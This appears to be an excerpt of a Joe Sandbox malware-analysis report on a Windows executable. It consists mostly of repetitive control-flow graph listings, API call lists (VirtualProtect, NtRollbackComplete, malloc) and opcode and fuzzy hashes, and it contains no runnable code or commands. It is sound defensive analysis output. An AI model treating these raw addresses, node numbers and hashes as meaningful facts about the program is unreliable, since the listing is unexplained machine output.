3835->3836 3837 7ff62d5f15a3 3836->3837 3838 7ff62d5f15a8 3837->3838 3839 7ff62d5f1394 2 API calls 3837->3839 3840 7ff62d5f1394 2 API calls 3838->3840 3839->3838 3841 7ff62d5f15b7 3840->3841 3842 7ff62d5f1394 2 API calls 3841->3842 3843 7ff62d5f15c1 3842->3843 3844 7ff62d5f1394 2 API calls 3843->3844 3845 7ff62d5f15c6 3844->3845 3846 7ff62d5f1394 2 API calls 3845->3846 3847 7ff62d5f15d5 3846->3847 3848 7ff62d5f1394 2 API calls 3847->3848 3849 7ff62d5f15e4 3848->3849 3850 
7ff62d5f1394 2 API calls 3849->3850 3851 7ff62d5f15f3 3850->3851 3851->3745 3851->3748 3851->3753 3853 7ff62d5f1394 2 API calls 3852->3853 3854 7ff62d5f14f4 3853->3854 3855 7ff62d5f1394 2 API calls 3854->3855 3856 7ff62d5f1503 3855->3856 3857 7ff62d5f1394 2 API calls 3856->3857 3858 7ff62d5f1512 3857->3858 3859 7ff62d5f1394 2 API calls 3858->3859 3860 7ff62d5f1521 3859->3860 3861 7ff62d5f1530 3860->3861 3862 7ff62d5f1394 2 API calls 3860->3862 3863 7ff62d5f1394 2 API calls 3861->3863 3862->3861 3864 7ff62d5f153a 3863->3864 3865 7ff62d5f153f 3864->3865 3866 7ff62d5f1394 2 API calls 3864->3866 3867 7ff62d5f1394 2 API calls 3865->3867 3866->3865 3868 7ff62d5f154e 3867->3868 3869 7ff62d5f1394 2 API calls 3868->3869 3870 7ff62d5f1558 3869->3870 3871 7ff62d5f155d 3870->3871 3872 7ff62d5f1394 2 API calls 3870->3872 3873 7ff62d5f1394 2 API calls 3871->3873 3872->3871 3874 7ff62d5f1567 3873->3874 3875 7ff62d5f156c 3874->3875 3876 7ff62d5f1394 2 API calls 3874->3876 3877 7ff62d5f1394 2 API calls 3875->3877 3876->3875 3878 7ff62d5f1576 3877->3878 3879 7ff62d5f157b 3878->3879 3880 7ff62d5f1394 2 API calls 3878->3880 3881 7ff62d5f1394 2 API calls 3879->3881 3880->3879 3882 7ff62d5f1585 3881->3882 3883 7ff62d5f158a 3882->3883 3884 7ff62d5f1394 2 API calls 3882->3884 3885 7ff62d5f1394 2 API calls 3883->3885 3884->3883 3886 7ff62d5f1599 3885->3886 3887 7ff62d5f1394 2 API calls 3886->3887 3888 7ff62d5f15a3 3887->3888 3889 7ff62d5f15a8 3888->3889 3890 7ff62d5f1394 2 API calls 3888->3890 3891 7ff62d5f1394 2 API calls 3889->3891 3890->3889 3892 7ff62d5f15b7 3891->3892 3893 7ff62d5f1394 2 API calls 3892->3893 3894 7ff62d5f15c1 3893->3894 3895 7ff62d5f1394 2 API calls 3894->3895 3896 7ff62d5f15c6 3895->3896 3897 7ff62d5f1394 2 API calls 3896->3897 3898 7ff62d5f15d5 3897->3898 3899 7ff62d5f1394 2 API calls 3898->3899 3900 7ff62d5f15e4 3899->3900 3901 7ff62d5f1394 2 API calls 3900->3901 3902 7ff62d5f15f3 3901->3902 3902->3745 3904 7ff62d5f1394 2 API calls 3903->3904 3905 7ff62d5f1503 
3904->3905 3906 7ff62d5f1394 2 API calls 3905->3906 3907 7ff62d5f1512 3906->3907 3908 7ff62d5f1394 2 API calls 3907->3908 3909 7ff62d5f1521 3908->3909 3910 7ff62d5f1530 3909->3910 3911 7ff62d5f1394 2 API calls 3909->3911 3912 7ff62d5f1394 2 API calls 3910->3912 3911->3910 3913 7ff62d5f153a 3912->3913 3914 7ff62d5f153f 3913->3914 3915 7ff62d5f1394 2 API calls 3913->3915 3916 7ff62d5f1394 2 API calls 3914->3916 3915->3914 3917 7ff62d5f154e 3916->3917 3918 7ff62d5f1394 2 API calls 3917->3918 3919 7ff62d5f1558 3918->3919 3920 7ff62d5f155d 3919->3920 3921 7ff62d5f1394 2 API calls 3919->3921 3922 7ff62d5f1394 2 API calls 3920->3922 3921->3920 3923 7ff62d5f1567 3922->3923 3924 7ff62d5f156c 3923->3924 3925 7ff62d5f1394 2 API calls 3923->3925 3926 7ff62d5f1394 2 API calls 3924->3926 3925->3924 3927 7ff62d5f1576 3926->3927 3928 7ff62d5f157b 3927->3928 3929 7ff62d5f1394 2 API calls 3927->3929 3930 7ff62d5f1394 2 API calls 3928->3930 3929->3928 3931 7ff62d5f1585 3930->3931 3932 7ff62d5f158a 3931->3932 3933 7ff62d5f1394 2 API calls 3931->3933 3934 7ff62d5f1394 2 API calls 3932->3934 3933->3932 3935 7ff62d5f1599 3934->3935 3936 7ff62d5f1394 2 API calls 3935->3936 3937 7ff62d5f15a3 3936->3937 3938 7ff62d5f15a8 3937->3938 3939 7ff62d5f1394 2 API calls 3937->3939 3940 7ff62d5f1394 2 API calls 3938->3940 3939->3938 3941 7ff62d5f15b7 3940->3941 3942 7ff62d5f1394 2 API calls 3941->3942 3943 7ff62d5f15c1 3942->3943 3944 7ff62d5f1394 2 API calls 3943->3944 3945 7ff62d5f15c6 3944->3945 3946 7ff62d5f1394 2 API calls 3945->3946 3947 7ff62d5f15d5 3946->3947 3948 7ff62d5f1394 2 API calls 3947->3948 3949 7ff62d5f15e4 3948->3949 3950 7ff62d5f1394 2 API calls 3949->3950 3951 7ff62d5f15f3 3950->3951 3951->3768 3953 7ff62d5f1394 2 API calls 3952->3953 3954 7ff62d5f142c 3953->3954 3955 7ff62d5f1431 3954->3955 3956 7ff62d5f1394 2 API calls 3954->3956 3957 7ff62d5f1394 2 API calls 3955->3957 3956->3955 3958 7ff62d5f143b 3957->3958 3959 7ff62d5f1440 3958->3959 3960 7ff62d5f1394 2 API calls 3958->3960 
3961 7ff62d5f1394 2 API calls 3959->3961 3960->3959 3962 7ff62d5f144f 3961->3962 3963 7ff62d5f1394 2 API calls 3962->3963 3964 7ff62d5f1459 3963->3964 3965 7ff62d5f145e 3964->3965 3966 7ff62d5f1394 2 API calls 3964->3966 3967 7ff62d5f1394 2 API calls 3965->3967 3966->3965 3968 7ff62d5f1468 3967->3968 3969 7ff62d5f146d 3968->3969 3970 7ff62d5f1394 2 API calls 3968->3970 3971 7ff62d5f1394 2 API calls 3969->3971 3970->3969 3972 7ff62d5f1477 3971->3972 3973 7ff62d5f147c 3972->3973 3974 7ff62d5f1394 2 API calls 3972->3974 3975 7ff62d5f1394 2 API calls 3973->3975 3974->3973 3976 7ff62d5f1486 3975->3976 3977 7ff62d5f148b 3976->3977 3978 7ff62d5f1394 2 API calls 3976->3978 3979 7ff62d5f1394 2 API calls 3977->3979 3978->3977 3980 7ff62d5f1495 3979->3980 3981 7ff62d5f149a 3980->3981 3982 7ff62d5f1394 2 API calls 3980->3982 3983 7ff62d5f1394 2 API calls 3981->3983 3982->3981 3984 7ff62d5f14a4 3983->3984 3985 7ff62d5f14a9 3984->3985 3986 7ff62d5f1394 2 API calls 3984->3986 3987 7ff62d5f1394 2 API calls 3985->3987 3986->3985 3988 7ff62d5f14b3 3987->3988 3989 7ff62d5f1394 2 API calls 3988->3989 3990 7ff62d5f14b8 3989->3990 3991 7ff62d5f1394 2 API calls 3990->3991 3992 7ff62d5f14c7 3991->3992 3993 7ff62d5f1394 2 API calls 3992->3993 3994 7ff62d5f14d6 3993->3994 3995 7ff62d5f1394 2 API calls 3994->3995 3996 7ff62d5f14e5 3995->3996 3997 7ff62d5f1394 2 API calls 3996->3997 3998 7ff62d5f14f4 3997->3998 3999 7ff62d5f1394 2 API calls 3998->3999 4000 7ff62d5f1503 3999->4000 4001 7ff62d5f1394 2 API calls 4000->4001 4002 7ff62d5f1512 4001->4002 4003 7ff62d5f1394 2 API calls 4002->4003 4004 7ff62d5f1521 4003->4004 4005 7ff62d5f1530 4004->4005 4006 7ff62d5f1394 2 API calls 4004->4006 4007 7ff62d5f1394 2 API calls 4005->4007 4006->4005 4008 7ff62d5f153a 4007->4008 4009 7ff62d5f153f 4008->4009 4010 7ff62d5f1394 2 API calls 4008->4010 4011 7ff62d5f1394 2 API calls 4009->4011 4010->4009 4012 7ff62d5f154e 4011->4012 4013 7ff62d5f1394 2 API calls 4012->4013 4014 7ff62d5f1558 4013->4014 4015 
7ff62d5f155d 4014->4015 4016 7ff62d5f1394 2 API calls 4014->4016 4017 7ff62d5f1394 2 API calls 4015->4017 4016->4015 4018 7ff62d5f1567 4017->4018 4019 7ff62d5f156c 4018->4019 4020 7ff62d5f1394 2 API calls 4018->4020 4021 7ff62d5f1394 2 API calls 4019->4021 4020->4019 4022 7ff62d5f1576 4021->4022 4023 7ff62d5f157b 4022->4023 4024 7ff62d5f1394 2 API calls 4022->4024 4025 7ff62d5f1394 2 API calls 4023->4025 4024->4023 4026 7ff62d5f1585 4025->4026 4027 7ff62d5f158a 4026->4027 4028 7ff62d5f1394 2 API calls 4026->4028 4029 7ff62d5f1394 2 API calls 4027->4029 4028->4027 4030 7ff62d5f1599 4029->4030 4031 7ff62d5f1394 2 API calls 4030->4031 4032 7ff62d5f15a3 4031->4032 4033 7ff62d5f15a8 4032->4033 4034 7ff62d5f1394 2 API calls 4032->4034 4035 7ff62d5f1394 2 API calls 4033->4035 4034->4033 4036 7ff62d5f15b7 4035->4036 4037 7ff62d5f1394 2 API calls 4036->4037 4038 7ff62d5f15c1 4037->4038 4039 7ff62d5f1394 2 API calls 4038->4039 4040 7ff62d5f15c6 4039->4040 4041 7ff62d5f1394 2 API calls 4040->4041 4042 7ff62d5f15d5 4041->4042 4043 7ff62d5f1394 2 API calls 4042->4043 4044 7ff62d5f15e4 4043->4044 4045 7ff62d5f1394 2 API calls 4044->4045 4046 7ff62d5f15f3 4045->4046 4046->3650 4048 7ff62d5f1394 2 API calls 4047->4048 4049 7ff62d5f143b 4048->4049 4050 7ff62d5f1440 4049->4050 4051 7ff62d5f1394 2 API calls 4049->4051 4052 7ff62d5f1394 2 API calls 4050->4052 4051->4050 4053 7ff62d5f144f 4052->4053 4054 7ff62d5f1394 2 API calls 4053->4054 4055 7ff62d5f1459 4054->4055 4056 7ff62d5f145e 4055->4056 4057 7ff62d5f1394 2 API calls 4055->4057 4058 7ff62d5f1394 2 API calls 4056->4058 4057->4056 4059 7ff62d5f1468 4058->4059 4060 7ff62d5f146d 4059->4060 4061 7ff62d5f1394 2 API calls 4059->4061 4062 7ff62d5f1394 2 API calls 4060->4062 4061->4060 4063 7ff62d5f1477 4062->4063 4064 7ff62d5f147c 4063->4064 4065 7ff62d5f1394 2 API calls 4063->4065 4066 7ff62d5f1394 2 API calls 4064->4066 4065->4064 4067 7ff62d5f1486 4066->4067 4068 7ff62d5f148b 4067->4068 4069 7ff62d5f1394 2 API calls 4067->4069 4070 
7ff62d5f1394 2 API calls 4068->4070 4069->4068 4071 7ff62d5f1495 4070->4071 4072 7ff62d5f149a 4071->4072 4073 7ff62d5f1394 2 API calls 4071->4073 4074 7ff62d5f1394 2 API calls 4072->4074 4073->4072 4075 7ff62d5f14a4 4074->4075 4076 7ff62d5f14a9 4075->4076 4077 7ff62d5f1394 2 API calls 4075->4077 4078 7ff62d5f1394 2 API calls 4076->4078 4077->4076 4079 7ff62d5f14b3 4078->4079 4080 7ff62d5f1394 2 API calls 4079->4080 4081 7ff62d5f14b8 4080->4081 4082 7ff62d5f1394 2 API calls 4081->4082 4083 7ff62d5f14c7 4082->4083 4084 7ff62d5f1394 2 API calls 4083->4084 4085 7ff62d5f14d6 4084->4085 4086 7ff62d5f1394 2 API calls 4085->4086 4087 7ff62d5f14e5 4086->4087 4088 7ff62d5f1394 2 API calls 4087->4088 4089 7ff62d5f14f4 4088->4089 4090 7ff62d5f1394 2 API calls 4089->4090 4091 7ff62d5f1503 4090->4091 4092 7ff62d5f1394 2 API calls 4091->4092 4093 7ff62d5f1512 4092->4093 4094 7ff62d5f1394 2 API calls 4093->4094 4095 7ff62d5f1521 4094->4095 4096 7ff62d5f1530 4095->4096 4097 7ff62d5f1394 2 API calls 4095->4097 4098 7ff62d5f1394 2 API calls 4096->4098 4097->4096 4099 7ff62d5f153a 4098->4099 4100 7ff62d5f153f 4099->4100 4101 7ff62d5f1394 2 API calls 4099->4101 4102 7ff62d5f1394 2 API calls 4100->4102 4101->4100 4103 7ff62d5f154e 4102->4103 4104 7ff62d5f1394 2 API calls 4103->4104 4105 7ff62d5f1558 4104->4105 4106 7ff62d5f155d 4105->4106 4107 7ff62d5f1394 2 API calls 4105->4107 4108 7ff62d5f1394 2 API calls 4106->4108 4107->4106 4109 7ff62d5f1567 4108->4109 4110 7ff62d5f156c 4109->4110 4111 7ff62d5f1394 2 API calls 4109->4111 4112 7ff62d5f1394 2 API calls 4110->4112 4111->4110 4113 7ff62d5f1576 4112->4113 4114 7ff62d5f157b 4113->4114 4115 7ff62d5f1394 2 API calls 4113->4115 4116 7ff62d5f1394 2 API calls 4114->4116 4115->4114 4117 7ff62d5f1585 4116->4117 4118 7ff62d5f158a 4117->4118 4119 7ff62d5f1394 2 API calls 4117->4119 4120 7ff62d5f1394 2 API calls 4118->4120 4119->4118 4121 7ff62d5f1599 4120->4121 4122 7ff62d5f1394 2 API calls 4121->4122 4123 7ff62d5f15a3 4122->4123 4124 
7ff62d5f15a8 4123->4124 4125 7ff62d5f1394 2 API calls 4123->4125 4126 7ff62d5f1394 2 API calls 4124->4126 4125->4124 4127 7ff62d5f15b7 4126->4127 4128 7ff62d5f1394 2 API calls 4127->4128 4129 7ff62d5f15c1 4128->4129 4130 7ff62d5f1394 2 API calls 4129->4130 4131 7ff62d5f15c6 4130->4131 4132 7ff62d5f1394 2 API calls 4131->4132 4133 7ff62d5f15d5 4132->4133 4134 7ff62d5f1394 2 API calls 4133->4134 4135 7ff62d5f15e4 4134->4135 4136 7ff62d5f1394 2 API calls 4135->4136 4137 7ff62d5f15f3 4136->4137 4137->3653 4139 7ff62d5f1394 2 API calls 4138->4139 4140 7ff62d5f14c7 4139->4140 4141 7ff62d5f1394 2 API calls 4140->4141 4142 7ff62d5f14d6 4141->4142 4143 7ff62d5f1394 2 API calls 4142->4143 4144 7ff62d5f14e5 4143->4144 4145 7ff62d5f1394 2 API calls 4144->4145 4146 7ff62d5f14f4 4145->4146 4147 7ff62d5f1394 2 API calls 4146->4147 4148 7ff62d5f1503 4147->4148 4149 7ff62d5f1394 2 API calls 4148->4149 4150 7ff62d5f1512 4149->4150 4151 7ff62d5f1394 2 API calls 4150->4151 4152 7ff62d5f1521 4151->4152 4153 7ff62d5f1530 4152->4153 4154 7ff62d5f1394 2 API calls 4152->4154 4155 7ff62d5f1394 2 API calls 4153->4155 4154->4153 4156 7ff62d5f153a 4155->4156 4157 7ff62d5f153f 4156->4157 4158 7ff62d5f1394 2 API calls 4156->4158 4159 7ff62d5f1394 2 API calls 4157->4159 4158->4157 4160 7ff62d5f154e 4159->4160 4161 7ff62d5f1394 2 API calls 4160->4161 4162 7ff62d5f1558 4161->4162 4163 7ff62d5f155d 4162->4163 4164 7ff62d5f1394 2 API calls 4162->4164 4165 7ff62d5f1394 2 API calls 4163->4165 4164->4163 4166 7ff62d5f1567 4165->4166 4167 7ff62d5f156c 4166->4167 4168 7ff62d5f1394 2 API calls 4166->4168 4169 7ff62d5f1394 2 API calls 4167->4169 4168->4167 4170 7ff62d5f1576 4169->4170 4171 7ff62d5f157b 4170->4171 4172 7ff62d5f1394 2 API calls 4170->4172 4173 7ff62d5f1394 2 API calls 4171->4173 4172->4171 4174 7ff62d5f1585 4173->4174 4175 7ff62d5f158a 4174->4175 4176 7ff62d5f1394 2 API calls 4174->4176 4177 7ff62d5f1394 2 API calls 4175->4177 4176->4175 4178 7ff62d5f1599 4177->4178 4179 7ff62d5f1394 2 API 
calls 4178->4179 4180 7ff62d5f15a3 4179->4180 4181 7ff62d5f15a8 4180->4181 4182 7ff62d5f1394 2 API calls 4180->4182 4183 7ff62d5f1394 2 API calls 4181->4183 4182->4181 4184 7ff62d5f15b7 4183->4184 4185 7ff62d5f1394 2 API calls 4184->4185 4186 7ff62d5f15c1 4185->4186 4187 7ff62d5f1394 2 API calls 4186->4187 4188 7ff62d5f15c6 4187->4188 4189 7ff62d5f1394 2 API calls 4188->4189 4190 7ff62d5f15d5 4189->4190 4191 7ff62d5f1394 2 API calls 4190->4191 4192 7ff62d5f15e4 4191->4192 4193 7ff62d5f1394 2 API calls 4192->4193 4194 7ff62d5f15f3 4193->4194 4194->3727 4196 7ff62d5f1394 2 API calls 4195->4196 4197 7ff62d5f15e4 4196->4197 4198 7ff62d5f1394 2 API calls 4197->4198 4199 7ff62d5f15f3 4198->4199 4199->3727 4201 7ff62d5f1394 2 API calls 4200->4201 4202 7ff62d5f1495 4201->4202 4203 7ff62d5f149a 4202->4203 4204 7ff62d5f1394 2 API calls 4202->4204 4205 7ff62d5f1394 2 API calls 4203->4205 4204->4203 4206 7ff62d5f14a4 4205->4206 4207 7ff62d5f14a9 4206->4207 4208 7ff62d5f1394 2 API calls 4206->4208 4209 7ff62d5f1394 2 API calls 4207->4209 4208->4207 4210 7ff62d5f14b3 4209->4210 4211 7ff62d5f1394 2 API calls 4210->4211 4212 7ff62d5f14b8 4211->4212 4213 7ff62d5f1394 2 API calls 4212->4213 4214 7ff62d5f14c7 4213->4214 4215 7ff62d5f1394 2 API calls 4214->4215 4216 7ff62d5f14d6 4215->4216 4217 7ff62d5f1394 2 API calls 4216->4217 4218 7ff62d5f14e5 4217->4218 4219 7ff62d5f1394 2 API calls 4218->4219 4220 7ff62d5f14f4 4219->4220 4221 7ff62d5f1394 2 API calls 4220->4221 4222 7ff62d5f1503 4221->4222 4223 7ff62d5f1394 2 API calls 4222->4223 4224 7ff62d5f1512 4223->4224 4225 7ff62d5f1394 2 API calls 4224->4225 4226 7ff62d5f1521 4225->4226 4227 7ff62d5f1530 4226->4227 4228 7ff62d5f1394 2 API calls 4226->4228 4229 7ff62d5f1394 2 API calls 4227->4229 4228->4227 4230 7ff62d5f153a 4229->4230 4231 7ff62d5f153f 4230->4231 4232 7ff62d5f1394 2 API calls 4230->4232 4233 7ff62d5f1394 2 API calls 4231->4233 4232->4231 4234 7ff62d5f154e 4233->4234 4235 7ff62d5f1394 2 API calls 4234->4235 4236 
7ff62d5f1558 4235->4236 4237 7ff62d5f155d 4236->4237 4238 7ff62d5f1394 2 API calls 4236->4238 4239 7ff62d5f1394 2 API calls 4237->4239 4238->4237 4240 7ff62d5f1567 4239->4240 4241 7ff62d5f156c 4240->4241 4242 7ff62d5f1394 2 API calls 4240->4242 4243 7ff62d5f1394 2 API calls 4241->4243 4242->4241 4244 7ff62d5f1576 4243->4244 4245 7ff62d5f157b 4244->4245 4246 7ff62d5f1394 2 API calls 4244->4246 4247 7ff62d5f1394 2 API calls 4245->4247 4246->4245 4248 7ff62d5f1585 4247->4248 4249 7ff62d5f158a 4248->4249 4250 7ff62d5f1394 2 API calls 4248->4250 4251 7ff62d5f1394 2 API calls 4249->4251 4250->4249 4252 7ff62d5f1599 4251->4252 4253 7ff62d5f1394 2 API calls 4252->4253 4254 7ff62d5f15a3 4253->4254 4255 7ff62d5f15a8 4254->4255 4256 7ff62d5f1394 2 API calls 4254->4256 4257 7ff62d5f1394 2 API calls 4255->4257 4256->4255 4258 7ff62d5f15b7 4257->4258 4259 7ff62d5f1394 2 API calls 4258->4259 4260 7ff62d5f15c1 4259->4260 4261 7ff62d5f1394 2 API calls 4260->4261 4262 7ff62d5f15c6 4261->4262 4263 7ff62d5f1394 2 API calls 4262->4263 4264 7ff62d5f15d5 4263->4264 4265 7ff62d5f1394 2 API calls 4264->4265 4266 7ff62d5f15e4 4265->4266 4267 7ff62d5f1394 2 API calls 4266->4267 4268 7ff62d5f15f3 4267->4268 4268->3720 4269 7ff62d5f149a 4268->4269 4270 7ff62d5f1394 2 API calls 4269->4270 4271 7ff62d5f14a4 4270->4271 4272 7ff62d5f14a9 4271->4272 4273 7ff62d5f1394 2 API calls 4271->4273 4274 7ff62d5f1394 2 API calls 4272->4274 4273->4272 4275 7ff62d5f14b3 4274->4275 4276 7ff62d5f1394 2 API calls 4275->4276 4277 7ff62d5f14b8 4276->4277 4278 7ff62d5f1394 2 API calls 4277->4278 4279 7ff62d5f14c7 4278->4279 4280 7ff62d5f1394 2 API calls 4279->4280 4281 7ff62d5f14d6 4280->4281 4282 7ff62d5f1394 2 API calls 4281->4282 4283 7ff62d5f14e5 4282->4283 4284 7ff62d5f1394 2 API calls 4283->4284 4285 7ff62d5f14f4 4284->4285 4286 7ff62d5f1394 2 API calls 4285->4286 4287 7ff62d5f1503 4286->4287 4288 7ff62d5f1394 2 API calls 4287->4288 4289 7ff62d5f1512 4288->4289 4290 7ff62d5f1394 2 API calls 4289->4290 4291 
                                                      Remainder of the graph listing for image 00007FF62D5F0000 (node and edge rendering data omitted; edges into nodes outside this excerpt, e.g. 3716, 3720, 3731, 3736, are not reproduced). Functions and the APIs their nodes are labelled with:
                                                      • 7ff62d5f1394: malloc (via 7ff62d5f8410 / 7ff62d5f851f) and NtRollbackComplete (7ff62d5f13c6, a Kernel Transaction Manager call); invoked from a long run of consecutive call sites between 7ff62d5f1486 and 7ff62d5f15f3, each summarised as "2 API calls"
                                                      • 7ff62d5f1000: __set_app_type (7ff62d5f108b); 7ff62d5f1e00 → __setusermatherr (7ff62d5f89a0)
                                                      • 7ff62d5f1800: fprintf (7ff62d5f1835)
                                                      • 7ff62d5f1a70 / 7ff62d5f1ab3 / 7ff62d5f199e: VirtualProtect (7ff62d5f19e9); 7ff62d5f1ba0 summarised as "4 API calls"
                                                      • 7ff62d5f1e10: signal (7ff62d5f1ed3, 7ff62d5f1eea, 7ff62d5f1f12); 7ff62d5f1f47: signal (7ff62d5f1e67, 7ff62d5f1e82)
                                                      • 7ff62d5f1fd0: EnterCriticalSection, LeaveCriticalSection (7ff62d5f1ffd)
                                                      • 7ff62d5f2050: EnterCriticalSection (7ff62d5f205e), free (7ff62d5f20bd), LeaveCriticalSection (7ff62d5f20c2)
                                                      • 7ff62d5f216f: InitializeCriticalSection (7ff62d5f2178)
                                                      • 7ff62d5f219e: EnterCriticalSection (7ff62d5f21ab), TlsGetValue and GetLastError (7ff62d5f21e9), LeaveCriticalSection (7ff62d5f2265)
                                                      • 7ff62d5f2320: strlen

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1491057517.00007FF62D5F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF62D5F0000, based on PE: true
                                                      • Associated: 00000018.00000002.1490955253.00007FF62D5F0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000018.00000002.1491087337.00007FF62D5F9000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000018.00000002.1491115659.00007FF62D5FB000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000018.00000002.1491435684.00007FF62D874000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff62d5f0000_atpljrtdlbzl.jbxd
                                                      Similarity
                                                      • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                      • String ID:
                                                      • API String ID: 2643109117-0
                                                      • Opcode ID: 6280596cb761b5b6b7eb17237f18733a4a3115df363d340f4ddf780b65251a53
                                                      • Instruction ID: 8c95d4949ca3767e0d4992e8003e3ce95dfb111b6b6208dd1674a93e87becdf9
                                                      • Opcode Fuzzy Hash: 6280596cb761b5b6b7eb17237f18733a4a3115df363d340f4ddf780b65251a53
                                                      • Instruction Fuzzy Hash: D3513975A09A4289FE109B16ED50B7927A4BF86780F049431CD4DEF3A6FEBCA441C723

                                                      Control-flow Graph

                                                      APIs
                                                      • NtRollbackComplete.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62D5F1156), ref: 00007FF62D5F13F7
                                                      Similarity
                                                      • API ID: CompleteRollback
                                                      • String ID:
                                                      • API String ID: 2623960542-0
                                                      • Opcode ID: 5448f1e04505633c8b83ac876f5ebd2ce998eb501d9696bc89039fdec386beb0
                                                      • Instruction ID: 764c643ff97642bab22362991b9c502825457b737d139103379e0d5991a2ea5b
                                                      • Opcode Fuzzy Hash: 5448f1e04505633c8b83ac876f5ebd2ce998eb501d9696bc89039fdec386beb0
                                                      • Instruction Fuzzy Hash: FDF0C971908F41CADB14DB51FC4002A7764FB4A381B004835ED9CAB725FF7CE0508B65

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                      • String ID: 0$7%2h$X$`
                                                      • API String ID: 329590056-1471948811
                                                      • Opcode ID: b95cf91eda7b68f57c5181f3b1c7e46db98f7d87f2357bb82c327b923f2a006a
                                                      • Instruction ID: f3bba8b52d9417ebc985a7fc0663b83d9a4926ad7a0cf5e496c41f3701f9af5f
                                                      • Opcode Fuzzy Hash: b95cf91eda7b68f57c5181f3b1c7e46db98f7d87f2357bb82c327b923f2a006a
                                                      • Instruction Fuzzy Hash: 00028E22A08B8189FB208F15EC443AA77A0FB857A4F008235DE9C9B7E5EF7CD145C752

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: memset$wcscatwcscpywcslen
                                                      • String ID: $0$0$@$@
                                                      • API String ID: 4263182637-1413854666
                                                      • Opcode ID: 1162d33619bbb34c0f2e9a143d3f60e9be2465dce8d2f97103770710023d22b8
                                                      • Instruction ID: d80e48b40a809958e2534c11ff561131a7e5198fe6554ddda8c12cad79a11696
                                                      • Opcode Fuzzy Hash: 1162d33619bbb34c0f2e9a143d3f60e9be2465dce8d2f97103770710023d22b8
                                                      • Instruction Fuzzy Hash: D3B1812191C6C199FB218B24EC453BAB7A0FF85344F404135EEC99ABA5EFBDE145CB12

                                                      Control-flow Graph

                                                      APIs
                                                      • VirtualQuery.KERNEL32(?,?,?,?,00007FF62D5FA4A8,00007FF62D5FA4A8,?,?,00007FF62D5F0000,?,00007FF62D5F1991), ref: 00007FF62D5F1C63
                                                      • VirtualProtect.KERNEL32(?,?,?,?,00007FF62D5FA4A8,00007FF62D5FA4A8,?,?,00007FF62D5F0000,?,00007FF62D5F1991), ref: 00007FF62D5F1CC7
                                                      • memcpy.MSVCRT ref: 00007FF62D5F1CE0
                                                      • GetLastError.KERNEL32(?,?,?,?,00007FF62D5FA4A8,00007FF62D5FA4A8,?,?,00007FF62D5F0000,?,00007FF62D5F1991), ref: 00007FF62D5F1D23
                                                      Strings
                                                      Similarity
                                                      • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                      • API String ID: 2595394609-2123141913
                                                      • Opcode ID: a73c2b82d557c5aae947ae703203d5278343e9bd1baf2771f34c60c14f44de3e
                                                      • Instruction ID: 84d75818e5cece5bff9c8d9062b2a79010c4d9d11c208fdfe0b60ac1ba94c6a3
                                                      • Opcode Fuzzy Hash: a73c2b82d557c5aae947ae703203d5278343e9bd1baf2771f34c60c14f44de3e
                                                      • Instruction Fuzzy Hash: E541AFA1A09A4399FE508B01DC44BB837A1EB86BC0F544132CE0DEB3A5FE7CE541C722

                                                      Control-flow Graph

                                                      APIs
                                                      Similarity
                                                      • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                      • String ID:
                                                      • API String ID: 3326252324-0
                                                      • Opcode ID: ebbd2e3b6cbfeac7cc2dca93027932662f1a6492cb86fc1cea6d36530fcbbc00
                                                      • Instruction ID: e79bfeca9544bfd144416b98e87f0cd3e0be6f4212940847fd67f162e24013e2
                                                      • Opcode Fuzzy Hash: ebbd2e3b6cbfeac7cc2dca93027932662f1a6492cb86fc1cea6d36530fcbbc00
                                                      • Instruction Fuzzy Hash: 0E21E965F09902A9FE659B019D407356260BF56B90F448030DD0EEFBA4FF7CA8828363

                                                      Control-flow Graph

                                                      Control-flow graph of 7ff62d5f1e10–7ff62d5f1f69 (block and edge rendering data omitted): calls signal at 7ff62d5f1ed3, 7ff62d5f1eea and 7ff62d5f1f12, calls the internal routine 7ff62d5f89b0 at 7ff62d5f1efb, and exits through 7ff62d5f1f60.
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CCG
                                                      • API String ID: 0-1584390748
                                                      • Opcode ID: 4a7ae61e09f356dcb3ca58e8778bf02f31e9e28ceccf92203711060f4d615a68
                                                      • Instruction ID: 56126f218b22b84bcaeb63db976f99a654f2be8aa9288a5504688bea868e8cae
                                                      • Opcode Fuzzy Hash: 4a7ae61e09f356dcb3ca58e8778bf02f31e9e28ceccf92203711060f4d615a68
                                                      • Instruction Fuzzy Hash: 9D21AF25F0C1064AFE7552149E80B7915819F8A7A4F298531DE1DEF3D8FFBDA8818273

                                                      Control-flow Graph

                                                      Control-flow graph of 7ff62d5f1880–7ff62d5f1b98 (block and edge rendering data omitted): calls 7ff62d5f2420 and 7ff62d5f2660 at 7ff62d5f18a2, 7ff62d5f1ba0 at 7ff62d5f1970 and 7ff62d5f1b36, 7ff62d5f1d40 at 7ff62d5f1b5c, 7ff62d5f1b74 and 7ff62d5f1b87, and VirtualProtect at 7ff62d5f19e9; the common exit is 7ff62d5f1a0f.
                                                      APIs
                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62D5F1247), ref: 00007FF62D5F19F9
                                                      Strings
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                      • API String ID: 544645111-395989641
                                                      • Opcode ID: 2650d536b62deb3d9d47a44c5ad09f6013c99e194f6b6cbe57e8081442e2c579
